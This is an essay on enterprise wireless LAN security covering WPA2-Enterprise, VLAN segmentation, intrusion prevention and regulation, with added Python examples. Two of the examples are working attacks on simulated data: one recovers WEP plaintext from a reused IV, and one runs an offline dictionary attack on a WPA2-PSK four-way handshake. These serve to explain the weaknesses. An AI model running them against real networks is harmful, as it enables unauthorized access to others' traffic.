Wireless Security in large Enterprises:
Abstract:
Wireless Local Area Network (WLAN) technology is one of the fastest growing segments of the networking market, held back mainly by its security limitations. It is now recognized, accepted and adopted by organizations worldwide, and many governments and companies recognize the competitive advantage of deploying wireless technologies in the workplace. Wireless technologies continue to evolve and deliver milestone advances in bandwidth, speed and security. Even so, many large enterprises remain reluctant to adopt wireless networks because of perceived security issues and the risks they pose to the organization.
WLAN is a disruptive technology with real security constraints. The industry moves quickly, driven by the adoption of new technologies and by users who demand new features while vendors are still addressing existing wireless security issues. Despite this, the industry's priority is to reduce the risk of compromise while continuing to improve the technology.
This paper addresses wireless security issues in large enterprise environments and gives an overview of the components, technologies, trends, standards, regulatory issues and challenges associated with wireless network security. The central question is whether wireless networks can be deployed securely at all, given the widespread perception that they are inherently insecure. The paper examines the security limitations of enterprise WLAN deployments and how to address them, covers current wireless security trends in large enterprises, and offers guidelines for the future of wireless network security. The global implications of the technologies and some of the industry players are also discussed.
Introduction: Enterprise WLAN Security Overview.
Rapid deployment of Wi-Fi networks by large enterprises worldwide has opened a new dimension in network security: wireless networks are exposed to malicious attackers and casual intruders alike. Data and applications have moved onto the airwaves on the strength of the productivity and efficiency gains delivered by mobile tools such as tablets, smartphones and notebook PCs. Alongside the existing wired infrastructure, WLANs help companies deliver services more efficiently, respond to customers faster and improve the customer experience in general.
The major implication of accessing corporate data over wireless networks is that these networks are easily reached by unwanted visitors and intruders if the proper tools and precautions are not in place. Less obvious is that the wired enterprise network also becomes susceptible to unauthorized access when wireless is not controlled, since a wireless foothold is usually a wired foothold as well. Five critical areas need to be examined when securing enterprise wireless networks:
- Creation of wireless network security policies.
- Securing of the enterprise WLAN.
- Securing the enterprise wired/Ethernet network.
- Securing corporate wireless devices e.g. laptops from wireless threats outside the enterprise.
- Employee education regarding wireless policies.
This paper discusses real industry approaches to wireless security and the best practices listed above. WLAN security must be complemented by strong wired network security policies and access controls; the paper assumes that VPN, firewall, wired IDS/IPS and VLAN segmentation for multiple user populations are already in place. Together these controls protect an enterprise from unauthorized access, data theft and the damage a breach does to its reputation with clients and partners.
- Creation of wireless network security policies:
The first step in securing a large enterprise wireless network is a written wireless security policy covering authorized network use and the required security measures. The background for the policy should be researched accurately and thoroughly, because most security incidents are traceable to errors and oversights made when the policy was implemented. A typical policy document includes purpose, scope, policy statements, responsibilities, enforcement, definitions and a revision history.
- Securing the enterprise WLAN:
The deployment of WLANs over the years has switched from guest access in conference areas, limited connectivity hotspots within large enterprises to full organizational coverage. However, many of these deployments are insecure and leave opportunities for curious or malicious intruders to try and gain access to confidential enterprise information. Securing a WLAN is made easier by technology advances and vendor innovation. Best practices include:
Changing the default/manufacturer’s SSID to a customized one:
Access points ship with a default network name (SSID) set by the manufacturer, such as linksys or dlink, which is broadcast in beacon frames to advertise the access point. Immediately after installation it should be changed to a name that does not identify the enterprise: avoid company names, phone numbers, addresses or anything else that can be guessed or found on the internet. A custom SSID is not a security control, however: the SSID is sent in the clear in beacons, probes and association requests, so renaming it only avoids advertising who owns the network.
Use of Strong Encryption and Authentication protocols:
Default access point settings provide open access with no security enabled, which is a major reason WLANs are compromised or used by unauthorized people. Secure access must therefore be enabled before an enterprise WLAN goes live. For large enterprises the most secure options are IEEE 802.11i (WPA2) with 802.1X authentication, or a strongly encrypted VPN over the wireless link.
IEEE 802.11i is marketed as WPA2 when an access point is Wi-Fi Alliance certified. WPA2-Enterprise uses IEEE 802.1X with an EAP method for mutual authentication between client and network, and AES-CCMP for data encryption. Mutual authentication holds only if the EAP method actually provides it: clients must be configured to validate the RADIUS server's certificate (for example with EAP-TLS, or PEAP with certificate checking enforced), otherwise a fake access point backed by a fake authentication server can harvest user credentials. Its predecessor WPA was an interim certification issued by the Wi-Fi Alliance while 802.11i was being ratified; WPA also uses 802.1X for authentication but encrypts with TKIP, an RC4-based patch over WEP, rather than the stronger AES-CCMP.
WPA-Enterprise and WPA2-Enterprise (802.11i) require a RADIUS server, which authenticates each user and delivers unique, rotating session keys to every client. The Personal variants instead use a single pre-shared key (PSK) known to every client; a shared secret of that kind cannot be revoked for one user and is unsuitable for a large enterprise. Vendors such as Cisco, Meetinghouse and Funk Software provide WPA and 802.11i compliant RADIUS servers.
When WPA and WPA2 cannot be used, the next option for securing the client connection is a VPN (Virtual Private Network). SSL and IPsec VPNs protect the tunneled traffic as well as WPA2 does, but with two disadvantages in large WLAN deployments: all traffic must pass through the VPN concentrator, creating a bottleneck, and latency sensitive applications such as Citrix and wireless VoIP may drop when roaming because of the long reconnection times. A VPN also protects only the tunnel, not the wireless link itself: the association remains open, so clients can be attacked on the local wireless segment and any traffic sent outside the tunnel is exposed.
Where none of the above can be deployed, the only remaining option is WEP. WEP is broken, not merely weak: its 24-bit initialization vector repeats after a few thousand frames, and its RC4 key schedule leaks key bits, so the key can be recovered in minutes with freely available tools. It is unacceptable as the sole protection for a large enterprise; at best it deters casual snoopers while stronger measures are put in place, and traffic on a WEP network should be treated as if it were sent in the clear.
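To make concrete why WEP falls so easily, the following added example (written for this page, not taken from the paper or from any vendor) implements RC4 and the WEP framing with a constructed 40-bit key, encrypts two frames under the same 24-bit IV, and recovers the second frame's payload from the first using nothing but the fixed LLC/SNAP header every IP frame carries. It also computes the birthday-bound probability that an IV has repeated after a given number of frames. The key, IV and frame contents are constructed; the CRC-32 ICV is omitted because it adds no security.

```python
"""WEP keystream reuse (added example, not from the paper).

WEP encrypts each frame with RC4 keyed by a 24-bit IV (sent in the clear)
followed by the shared secret. Two frames with the same IV use the same
keystream, so XORing their ciphertexts cancels the keystream; any known
plaintext (e.g. the fixed LLC/SNAP header) then reveals the other frame.
The secret, IV and frames below are constructed for illustration.
"""
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP calls it with key = IV || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):                                 # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                    # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte cleartext IV, then RC4(IV || secret) over the
    payload. The CRC-32 ICV is omitted; it adds no security anyway."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + secret, plaintext)


def recover_with_known_plaintext(frame_a: bytes, frame_b: bytes, known_a: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C_a ^ C_b ^ P_a = P_b
    for as many bytes as P_a is known."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ; the keystreams are independent")
    c_a, c_b = frame_a[3:], frame_b[3:]
    n = min(len(c_a), len(c_b), len(known_a))
    return bytes(c_a[k] ^ c_b[k] ^ known_a[k] for k in range(n))


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats after `frames`
    frames with uniformly random IVs. Cards that count IVs sequentially wrap
    deterministically after 2**24 frames, which is no better."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * 2 ** iv_bits))


# Constructed values: a 40-bit WEP key, one reused IV, two plaintext payloads.
SECRET = bytes.fromhex("0badc0ffee")
IV = bytes.fromhex("1a2b3c")
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")   # fixed header on every IP frame
FRAME_A_PLAIN = LLC_SNAP_IP + b"GET /login HTTP/1.1\r\n"
FRAME_B_PLAIN = LLC_SNAP_IP + b"user=admin&pw=s3cret"


def demo() -> bytes:
    """Encrypt both payloads under the same IV and recover frame B knowing
    only frame A's plaintext (not the key)."""
    frame_a = wep_encrypt(SECRET, IV, FRAME_A_PLAIN)
    frame_b = wep_encrypt(SECRET, IV, FRAME_B_PLAIN)
    return recover_with_known_plaintext(frame_a, frame_b, FRAME_A_PLAIN)


if __name__ == "__main__":
    print(demo())
    print(f"P(IV reuse) after 5000 frames: {iv_collision_probability(5000):.2f}")
```

Running it prints the second frame's plaintext and shows that after about 5,000 frames there is a better than even chance that some IV has already been reused. Real attacks (FMS and its successors) go further and recover the key itself from weak IVs, which is why WEP is considered broken rather than merely weak.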
User Population Segmentation using VLANs:
Different user groups in an enterprise need different things from the WLAN. Access points that support Virtual LANs (VLANs) let each authorized user reach only the resources that user requires: shipping and manufacturing staff, for example, might join an operations SSID that is mapped to a VLAN permitting only email and ERP access, while marketing and sales use a separate SSID whose VLAN reaches the sales and customer database. Each of these SSIDs still uses WPA or WPA2 (802.11i) encryption.
Large enterprises also run barcode scanners for inventory and goods receipt, and Wi-Fi phones are becoming common as wireless VoIP gains popularity. Many such devices do not support WPA or 802.11i but do support WEP. They can be placed on a dedicated WEP SSID mapped to a VLAN that reaches only the database or application they need, with frequent rotation of WEP keys and MAC address control lists to reduce the exposure. This is risk reduction, not security: MAC filters are bypassed by spoofing an observed address and WEP keys are recoverable, so the legacy VLAN must be treated as untrusted and firewalled to exactly the required application, and the devices replaced as soon as WPA2-capable models are available.
Secure Management Access:
The management interfaces of WLAN systems must support secure, authenticated management. Reconfiguring an access point through its management port is one way an attacker can gain entry to the corporate network. WLAN systems should therefore offer SSH (in place of Telnet), HTTPS/SSL (in place of plain HTTP web management) and SNMPv3, with the insecure alternatives disabled, and should be configurable so that management and modification of WLAN settings are accepted only from stations on a dedicated management VLAN.
Physical Security of Access Points:
Access points should be secured against direct access, tampering and theft. Wi-Fi access points should be deployed above suspended ceilings so that only the antenna is visible. Where this is impossible and access points can be reached physically, the local serial console should be disabled or password protected. Newer switch-based WLAN architectures also improve security by keeping configuration and keys in a centralized wireless switch that sits in a locked wiring closet, rather than in the access point itself.
Physical Monitoring of Premises:
Wireless signals often extend beyond the workplace perimeter, so a person outside the building can attempt to connect to the internal network. Surveillance cameras and security personnel should be used to spot people loitering around the premises for extended periods.
- Securing the Enterprise Wired Network Against Wireless Threats:
Even with all of the above precautions in place on the enterprise WLAN, serious vulnerabilities can remain, exposing enterprises to risk and to violations of regulations such as HIPAA or Sarbanes-Oxley. Enterprises that stick to wired networks and a "No Wi-Fi" policy are not protected either: employees can plug in their own rogue access points, and Wi-Fi enabled laptops on the wired LAN can connect to neighboring networks, bridging the corporate network to the outside.
These threats are real and significant, and traditional wired security infrastructure such as VPNs and firewalls does not detect them; once a device is inside the corporate firewall it is generally treated as trusted. In an era where Wi-Fi is almost ubiquitous, the corporate airspace should be considered an asset and protected as one. Methods to secure the enterprise wired network against wireless intrusion include:
Deployment of Automatic Wireless Intrusion Prevention and Detection Systems:
Wireless Intrusion Prevention Systems (WIPS) are dedicated security systems for detecting and preventing Wi-Fi attacks. They observe all wireless transmissions within range of their sensors and classify the devices they see according to rules set by the network administrator, and they can automatically quarantine rogue devices and transmissions. To detect and stop the various categories of wireless attack, WIPS rely on deterministic techniques: automatic event and device classification combined with association and protocol analysis. Attack signatures add detail to an alert but are not the primary detection mechanism.
Use of Overlay vs. Embedded WIPS:
Vendors of WLAN infrastructure may claim that their access points provide sufficient WIPS capability, but the integrated approach has several critical problems and offers only limited protection. For companies with a "No Wi-Fi" policy, or enterprises that do not deploy wireless everywhere, an integrated solution cannot cover the airspace at all, yet the whole airspace needs protection, because employees are most likely to introduce rogue access points, or connect to neighboring networks, exactly where no authorized WLAN exists. Even with enterprise-wide WLANs, integrated solutions fall short. Their attraction is the assumed low cost of deploying a single RF device and pulling a single cable.
Using access points as sensors, however, forces a trade-off between continuous threat monitoring and client connectivity: an access point radio cannot serve clients on one channel while scanning all channels in all bands. As more Wi-Fi devices join the enterprise network and need service, the integrated approach becomes less feasible.
Secondly, infrastructure vendors focus on delivering robust, reliable wireless client service rather than on securing corporate networks, and while Wi-Fi threats evolve rapidly these vendors struggle to keep up. In most cases the intrusion detection and prevention built into WLAN infrastructure is both minimal and disruptive. Many solutions claim to detect and prevent rogue access points, but an access point that is not on the enterprise switch network is not necessarily a rogue: it may be a harmless neighboring network or a legacy WLAN that is still in service. Prevention in such products tends to be blunt, using over-the-air containment that takes down the targeted access point and can disrupt authorized WLANs, or neighbors' networks, along with it; deliberately interfering with networks you do not own can also have legal consequences.
Security auditors may also enforce separate infrastructure in order to ensure compliance with regulations such as HIPAA and Sarbanes-Oxley.
Employing Wired Side Port blocking:
Wired-side port blocking is a technique usually employed alongside WIPS. Some WIPS vendors have integrated their systems with the management platforms of wired switch vendors so that wired port suppression complements wireless prevention. The WIPS server reports rogue access points to the central management appliance on the wired network, which then blocks all traffic on the switch port where the rogue access point is connected. This cuts the rogue off from the LAN without any over-the-air containment, provided the rogue's wired MAC address can be correlated with the switch's forwarding table.
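The deterministic classification described under WIPS above, and the wired-side correlation that port blocking depends on, in one added example (not code from any WIPS product). The sensor observations, the authorized BSSID list and the switch CAM (forwarding) table are constructed. The BSSID-to-wired-MAC offset heuristic is an assumption about how vendors allocate addresses, not a guarantee: a miss means "not proven on the wire", so such a device is logged rather than contained.

```python
"""Rogue access point classification with wired-side correlation
(added example, not from the paper or any vendor). All observations,
the authorized list and the CAM table are constructed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ObservedAP:
    bssid: str
    ssid: str
    channel: int
    rssi_dbm: int


@dataclass(frozen=True)
class CamEntry:
    mac: str        # MAC learned on a corporate switch port
    switch: str
    port: str


def mac_to_int(mac: str) -> int:
    return int(mac.replace(":", "").replace("-", ""), 16)


def wired_neighbor(bssid: str, cam: list, max_offset: int = 8) -> Optional[CamEntry]:
    """Heuristic (assumption): an AP's Ethernet MAC and its radio BSSIDs come from
    the same OUI block and differ by a small offset. Match against the switch CAM
    table; no match means 'not proven on the wire', not 'not on the wire'."""
    b = mac_to_int(bssid)
    for entry in cam:
        m = mac_to_int(entry.mac)
        if (b >> 24) == (m >> 24) and abs(b - m) <= max_offset:
            return entry
    return None


def classify(ap: ObservedAP, authorized_bssids: set, corporate_ssids: set, cam: list) -> str:
    """Deterministic verdict: authorized list first, then wired evidence,
    then SSID impersonation, otherwise an external neighbor."""
    bssid = ap.bssid.lower()
    if bssid in authorized_bssids:
        return "authorized"
    if wired_neighbor(bssid, cam) is not None:
        return "rogue-on-wire"          # unauthorized AP bridged into the LAN
    if ap.ssid in corporate_ssids:
        return "evil-twin"              # spoofs a corporate SSID, not on our wire
    return "external"                   # neighbor: log it, do not contain it


def response(ap: ObservedAP, verdict: str, cam: list) -> dict:
    """Only the on-wire rogue gets automatic containment, and it is wired-side
    (shut the switch port) rather than over-the-air, which can hit bystanders."""
    if verdict == "rogue-on-wire":
        entry = wired_neighbor(ap.bssid, cam)
        return {"action": "shutdown-port", "switch": entry.switch, "port": entry.port}
    if verdict == "evil-twin":
        return {"action": "alert-high", "note": "check for corporate clients; locate"}
    if verdict == "external":
        return {"action": "log"}
    return {"action": "none"}


# Constructed inventory: two managed APs, corporate SSIDs, and a CAM snapshot.
AUTHORIZED = {"00:1b:2f:aa:bb:c0", "00:1b:2f:aa:bb:c1"}
CORPORATE_SSIDS = {"corp-ops", "corp-sales"}
CAM = [
    CamEntry("00:1b:2f:aa:bb:bf", "sw-floor3", "Gi1/0/1"),    # managed AP's wired side
    CamEntry("00:25:9c:12:34:56", "sw-floor3", "Gi1/0/12"),   # unknown device on the LAN
    CamEntry("d4:3d:7e:01:02:03", "sw-floor3", "Gi1/0/20"),   # a workstation
]
# Constructed sensor scan: one managed AP, one rogue, one evil twin, one neighbor.
OBSERVED = [
    ObservedAP("00:1b:2f:aa:bb:c0", "corp-ops", 6, -45),
    ObservedAP("00:25:9c:12:34:57", "linksys", 11, -60),
    ObservedAP("c0:ff:ee:00:00:01", "corp-ops", 1, -70),
    ObservedAP("00:1d:7e:55:66:77", "CoffeeShop-Guest", 1, -80),
]


def scan_report(observed=OBSERVED, authorized=AUTHORIZED,
                corporate_ssids=CORPORATE_SSIDS, cam=CAM) -> list:
    """Return (bssid, verdict, response) for every observed access point."""
    report = []
    for ap in observed:
        verdict = classify(ap, authorized, corporate_ssids, cam)
        report.append((ap.bssid, verdict, response(ap, verdict, cam)))
    return report


if __name__ == "__main__":
    for bssid, verdict, action in scan_report():
        print(f"{bssid}  {verdict:14s}  {action}")
```

The design point is that an unauthorized access point which cannot be tied to a corporate switch port is only logged, while one that can be is removed by shutting its switch port. The response is taken on the wire, where only the rogue is affected, rather than in the air, where containment frames reach every network in range.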
Using Location Tracking for Physical Rectification:
The final step in eliminating a wireless threat is physically removing the rogue device. Locating it is not easy; conventionally a handheld analyzer has been used to walk the signal down, but because RF propagation is diffuse and reaches a long way this is time consuming, especially in large multi-floor buildings. Modern wireless IDS/IPS, using the signal strength seen by several sensors at once, provide more precise location estimates for faster rogue removal.
Performing Regular Wireless Vulnerability Assessments:
Regular wireless vulnerability assessments should be performed by both internal and external security auditors, using the same attack tools an intruder would to probe for specific threats and loopholes. Doing this regularly ensures that new wireless threats are discovered and contained. Findings that cannot be fixed by configuration indicate a flaw in the infrastructure itself, and the vendor should be asked for a software update.
- Securing Corporate Assets when outside the enterprise premises:
Wireless threats to the enterprise also exist outside its premises, especially given the proliferation of public Wi-Fi hotspots. Corporate laptops must carry the same level of protection as the enterprise network to defend them against the threats they face when connected to external public networks: personal firewalls, antivirus software and a VPN for all traffic. User authentication and data encryption (passwords, smart cards and full-drive encryption) provide access control and protect data if the device is lost. The use of ad hoc peer-to-peer wireless networks for file sharing should be discouraged, especially in public places where corporate information may be exposed to snoopers.
- Employee education on WLAN security policies:
Even with a well designed wireless security infrastructure, human error remains a significant cause of security incidents in large enterprises. Employees must therefore be educated on the wireless security policy, the threats it addresses and the consequences of non-compliance.
Regulatory Issues, Organizations involved and Future trends in wireless security:
The IEEE, manufacturers, vendors and other stakeholders have come a long way in replacing WEP. Full deployment of WPA2 (802.11i) gives large enterprises high assurance that only authorized users gain network access.
In the US, the Department of Defense (DoD) requires its WLANs to apply extensive protection to all data and voice traffic transmitted over a wireless network. Rather than defining its own standards, DoD policy mandates cryptographic modules validated under NIST's Federal Information Processing Standard (FIPS) 140-2 and products evaluated under the Common Criteria against the WLAN Access System Protection Profile. Healthcare, retail, financial and other large enterprises have adopted the same requirements, making FIPS validation central to demonstrating a WLAN deployment that the IT community accepts as secure.
Manufacturers have taken on the responsibility of designing FIPS-compliant infrastructure. Motorola, for example, had its enterprise-class RFS7000 and WS5100 switch platforms certified under FIPS 140-2 and the Common Criteria. Cisco Systems and Trapeze Networks are other major players in enterprise wireless security, offering solutions that add security layers beyond those defined by the standards.
Global Implications and future trends:
When WEP was found to be vulnerable and WPA and then WPA2 (802.11i) were developed, it was thought that these technologies could not be hacked. Since then WPA-secured networks have been attacked successfully: Beck and Tews (2008) showed that TKIP allows limited decryption and injection of short packets, and any network using a pre-shared key is only as strong as its passphrase, because a captured four-way handshake permits an unlimited offline dictionary attack. This illustrates how quickly the threat evolves and how slowly the industry keeps up.
As the case of WPA shows, future advances may never make WLANs entirely hack-proof, and a Fort Knox solution to enterprise-wide wireless security is not near. Nevertheless, with the right network infrastructure deployed with WPA2-Enterprise, large organizations can enjoy a high level of security while new technologies and new attacks continue to appear.
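To show what "cracked" means for a WPA-PSK network, the following added example (written for this page, not from the paper) implements the 802.11i key derivation for pre-shared key mode: PBKDF2 from passphrase and SSID to the PMK, PRF-512 to the PTK, and the HMAC-SHA1 MIC over EAPOL-Key message 2. It builds a simulated handshake from constructed MAC addresses, nonces and passphrase, then runs the offline dictionary attack that tools such as aircrack-ng and hashcat perform at scale. In WPA2-Enterprise the PMK is delivered by the EAP exchange and there is no passphrase to guess, which is the practical reason to prefer 802.1X in large deployments.

```python
"""WPA2-PSK four-way handshake: why 'WPA cracked' usually means 'weak passphrase'
(added example, not from the paper). MAC addresses, nonces and the passphrase
are constructed; the key derivation follows IEEE 802.11i.
"""
import hashlib
import hmac
from typing import Optional

EAPOL_MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of key descriptor before the MIC
# RSN IE advertising CCMP group/pairwise ciphers and the PSK AKM (constructed but well-formed).
RSN_IE_CCMP_PSK = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    In 802.1X mode the PMK comes from the EAP exchange and nothing here applies."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]        # KCK = [0:16] (signs the handshake), KEK = [16:32], TK = [32:48]


def build_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """EAPOL-Key message 2 of 4 (supplicant -> AP) with the MIC field zeroed.
    Layout: 802.1X header; descriptor type 2 (RSN); key info 0x010a (HMAC-SHA1
    MIC, pairwise, MIC present); key length; replay counter; SNonce; key IV;
    key RSC; key ID; MIC; key data length; key data (RSN IE)."""
    body = (bytes([2]) + (0x010A).to_bytes(2, "big") + (0).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + len(RSN_IE_CCMP_PSK).to_bytes(2, "big") + RSN_IE_CCMP_PSK)
    header = bytes([0x02, 0x03]) + len(body).to_bytes(2, "big")   # version 2, type EAPOL-Key
    return header + body


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame, truncated to 128 bits."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def simulate_capture(passphrase: str, ssid: str) -> dict:
    """Stand-in for a sniffed handshake: constructed MACs and nonces, real derivation."""
    aa = bytes.fromhex("001b2faabbc0")                   # AP (authenticator) MAC, constructed
    spa = bytes.fromhex("d43d7e010203")                  # client (supplicant) MAC, constructed
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    kck = ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = bytearray(build_msg2(snonce, 1))
    frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": bytes(frame)}


def crack_psk(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per candidate, no
    further contact with the network required. Returns the passphrase or None."""
    frame = bytearray(capture["eapol"])
    captured_mic = bytes(frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16])
    frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16] = bytes(16)   # MIC is computed over a zeroed field
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, bytes(frame)), captured_mic):
            return candidate
    return None


# Constructed wordlist; real attacks use lists with millions of entries.
WORDLIST = ["password", "12345678", "corpwifi2013", "Summer2013!", "letmein1"]

if __name__ == "__main__":
    cap = simulate_capture("Summer2013!", "corp-ops")
    print(crack_psk(cap, WORDLIST))   # a passphrase on the list falls immediately
```

The cost per guess is dominated by the 4096-iteration PBKDF2, which is why GPU crackers test the PMK rather than the handshake, and why a long random passphrase (or, better, 802.1X with per-user credentials) is the only defense once the handshake has been captured.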
It is expected that large enterprises and governments all over the world will adopt the wireless enterprise network security measures and technologies discussed above to protect their networks and gain a competitive edge in service delivery. Organizations, governments and individuals may also come up with more innovative ways of securing wireless networks by conducting extensive research in this area.
Conclusion:
The enterprise network has gradually evolved from the Ethernet paradigm to mobile wireless connectivity, especially in large organizations, and the challenge of securing confidential corporate information is now greater than ever. While there is no doubt that wireless technology has improved productivity, organizations must find secure ways of deploying it while remaining competitive. Fortunately, the wireless networking industry has also evolved considerably, developing new security solutions and standards for enterprise-wide wireless networks. Protecting corporate WLANs today, both on and off site, is possible, allowing enterprises to focus on serving clients and gaining a competitive edge.
References:
Informationweek (2013). InformationWeek. [online] Retrieved from: http://networkmagazine.com/shared/article/showArticle.jhtml?articled=15201417 [Accessed: 24 Apr 2013].
Isaac.cs.berkeley.edu (2001). (In)Security of the WEP algorithm. [online] Retrieved from: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [Accessed: 24 Apr 2013].
Itl.nist.gov (n.d.). WIRELESS TECHNOLOGY AND SECURITY. [online] Retrieved from: http://www.itl.nist.gov/lab/bulletns/bltnmar03.htm [Accessed: 24 Apr 2013].
Unknown. (2006). Best Practices for Securing Your Enterprise Wireless Network. [e-book] 339 N. Bernardo Avenue, Mountain View, CA 94043: Air Tight Networks. Available through: www.airtightnetworks.net http://www.airtightnetworks.com/fileadmin/pdf/whitepaper/Best_Practices_for_Securing_Your_Enterprise_Wireless_LAN.pdf [Accessed: 22 Apr 2013].
Unknown. (2008). Enterprise Wireless LAN Security. [e-book] Motorola. Available through: www.motorola.com http://www.motorola.com/web/Business/_Documents/static%20files/Enterprise%20WLAN%20Security_WP_0308.pdf [Accessed: 22 Apr 2013].
Iss.net (2013). WLAN FAQ; "Cisco SAFE: Wireless LAN". [online] Retrieved from: http://www.iss.net/wireless/WLAN_FAQ.php [Accessed: 24 Apr 2013].
Wifialliance.com (2013). Wi-Fi Alliance. [online] Retrieved from: http://www.wifialliance.com [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2003). Infrared WLAN. [online] Retrieved from: http://www.wi-fiplanet.com/tutorials/article.php/2110301 [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2003). WPA Security Enhancements. [online] Retrieved from: http://www.wi-fiplanet.com/tutorials/article.php/2148721 [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2005). Wi-Fi Alliance Plans for the Future. [online] Retrieved from: http://www.wi-fiplanet.com/news/article.php/3495936 [Accessed: 24 Apr 2013].